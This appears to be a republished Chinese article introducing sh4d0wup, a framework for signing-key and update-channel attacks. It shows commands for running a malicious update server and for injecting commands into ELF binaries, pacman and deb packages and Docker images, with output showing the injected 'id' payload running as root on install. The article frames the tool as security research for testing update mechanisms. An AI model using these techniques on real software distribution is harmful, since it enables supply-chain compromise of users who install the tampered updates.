sh4d0wup：一款功能强大的签名密钥与更新漏洞利用框架

关于sh4d0wup

你有没有想过，你下载的更新是其他人都得到的更新，还是你得到的只是为你做的不同的更新？sh4d0wup是一款功能强大的签名密钥与更新漏洞利用框架，而sh4d0wup名字主要针对的是Shadow update（影子更新）。

所谓Shadow update，是指官方不存在的更新，但带有有效签名，并会被客户视为真实的更新。如果签名密钥被黑客泄露，或者拥有合法访问权限的发布工程师想做坏事的话，就会发生这种情况。

sh4d0wup本质上是一个http/https更新服务器，在合法服务器面前充当反向代理，可以感染并签署各种工具、文件或代码格式。广大研究人员可以使用该工具来研究和测试自己系统的更新机制是否安全健壮。

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地：

	


git clone https://github.com/kpcyrd/sh4d0wup.git


（向右滑动，查看更多）

 编译一个Plot  
某些Plot的运行非常复杂，为了避免工具配置时间过长，我们可以预先构建好一个Plot，并提前创建好签名：




sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst

（向右滑动，查看更多）

 运行一个Plot 
下列命令将会根据Plot配置生成一个恶意HTTP更新服务器，并接收YAML文件：


	


sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst

（向右滑动，查看更多）
下面给出的是YAML文件样例：

contrib/plot-archlinux.yaml：https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-archlinux.yaml
contrib/plot-debian.yaml：https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-debian.yaml
contrib/plot-rustup.yaml：https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-rustup.yaml
contrib/plot-curl-sh.yaml：https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-curl-sh.yaml


 感染一个文件 

sh4d0wup infect elf


	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	


% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO  sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO  sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO  sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO  sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
Usage: a.out [OPTIONS] <COMMAND>
Commands:
  bait         开启一台恶意更新服务器
  infect        高级篡改模式，将附加命令注入到代码包中
  tamper     低级篡改模式，修补程序包数据库以添加恶意程序包、触发更新或影响依赖项解决方案
  keygen       使用给定参数生成签名密钥
  sign          使用签名密钥生成签名
  hsm          与硬件签名密钥交互
  build         基于Plot编译攻击行为
  check       检测Plot是否仍然可以执行
  completions  生成Shell脚本
  help         打印工具帮助信息
Options:
  -v, --verbose...   开启调试模式
  -h, --help        打印工具帮助信息

（向右滑动，查看更多）

sh4d0wup infect pacman


	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	


% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO  sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...
Packages (1) sh4d0wup-0.2.0-2
Total Installed Size:  13.36 MiB
Net Upgrade Size:       0.00 MiB
:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring                                         [#######################################] 100%
(1/1) checking package integrity                                       [#######################################] 100%
(1/1) loading package files                                            [#######################################] 100%
(1/1) checking for file conflicts                                      [#######################################] 100%
(1/1) checking available disk space                                    [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup                                               [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk

（向右滑动，查看更多）

sh4d0wup infect deb


	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	


% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
[2022-12-09T16:28:02Z INFO  sh4d0wup::infect::deb] Patching "control.tar.xz"
% sudo apt install ./apt_2.2.4-1_amd64.deb
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
Suggested packages:
  apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
Recommended packages:
  ca-certificates
The following packages will be upgraded:
  apt
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B/1491 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: delaying package configuration, since apt-utils is not installed
(Reading database ... 6661 files and directories currently installed.)
Preparing to unpack /apt_2.2.4-1_amd64.deb ...
Unpacking apt (2.2.4-1) over (2.2.4) ...
Setting up apt (2.2.4-1) ...
uid=0(root) gid=0(root) groups=0(root)
Processing triggers for libc-bin (2.31-13+deb11u5) ...

（向右滑动，查看更多）

sh4d0wup infect oci


	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	

	


% docker pull alpine:edge
% docker save alpine:edge > alpine-edge.tar
% sh4d0wup infect oci alpine-edge.tar infected.tar -c id -t infected:latest
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Original image is referencing config "121d0da757518198deeb7d1df20aaae549834f8bc77195bbf5be1900c0144cff.json": LayerConfig { config: Some(Config { user: Some(""), exposed_ports: None, env: Some(["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"]), entrypoint: None, cmd: Some(["/bin/sh"]), volumes: None, working_dir: Some(""), labels: None, stop_signal: None }), rootfs: Some(RootFs { type: "layers", diff_ids: ["sha256:2f7048230bc73ff091490aa5764f9c160d1a4efe04935da731a22e8d5fcccfcc"] }), extra: {"container_config": Object {"AttachStderr": Bool(false), "AttachStdin": Bool(false), "AttachStdout": Bool(false), "Cmd": Array [String("/bin/sh"), String("-c"), String("#(nop) "), String("CMD ["/bin/sh"]")], "Domainname": String(""), "Entrypoint": Null, "Env": Array [String("PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin")], "Hostname": String("457781b778a4"), "Image": String("sha256:28d4c3ce9341a318d475e64365e47a34d5b9ba6c670bed35ce90b2402296ead6"), "Labels": Object {}, "OnBuild": Null, "OpenStdin": Bool(false), "StdinOnce": Bool(false), "Tty": Bool(false), "User": String(""), "Volumes": Null, "WorkingDir": String("")}, "architecture": String("amd64"), "created": String("2022-11-10T20:19:29.043621251Z"), "history": Array [Object {"created": String("2022-11-10T20:19:28.834390785Z"), "created_by": String("/bin/sh -c #(nop) ADD file:51c4407dc777648e8ebc8e124b05feb1807699ade513b6006a9a409f6b0f6f51 in / ")}, Object {"created": String("2022-11-10T20:19:29.043621251Z"), "created_by": String("/bin/sh -c #(nop)  CMD ["/bin/sh"]"), "empty_layer": Bool(true)}], "os": String("linux"), "docker_version": String("20.10.12"), "container": String("457781b778a449c9eac455ca1a18300a4041cb2b0d2d3f979460d19d7632ebf7")} }
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Creating new layer in image: "patched"
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Generating filesystem layer for payload: "id"
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Updating tags of image to ["infected:latest"]
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Writing modified manifest...
% docker load -i infected.tar
Loaded image: infected:latest
% docker run -it infected echo hello world
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
hello world

（向右滑动，查看更多）

 许可证协议 
本项目的开发与发布遵循GPL-3.0开源许可证协议。

 项目地址 
sh4d0wup：https://github.com/kpcyrd/sh4d0wup











原文始发于微信公众号（FreeBuf）：sh4d0wup：一款功能强大的签名密钥与更新漏洞利用框架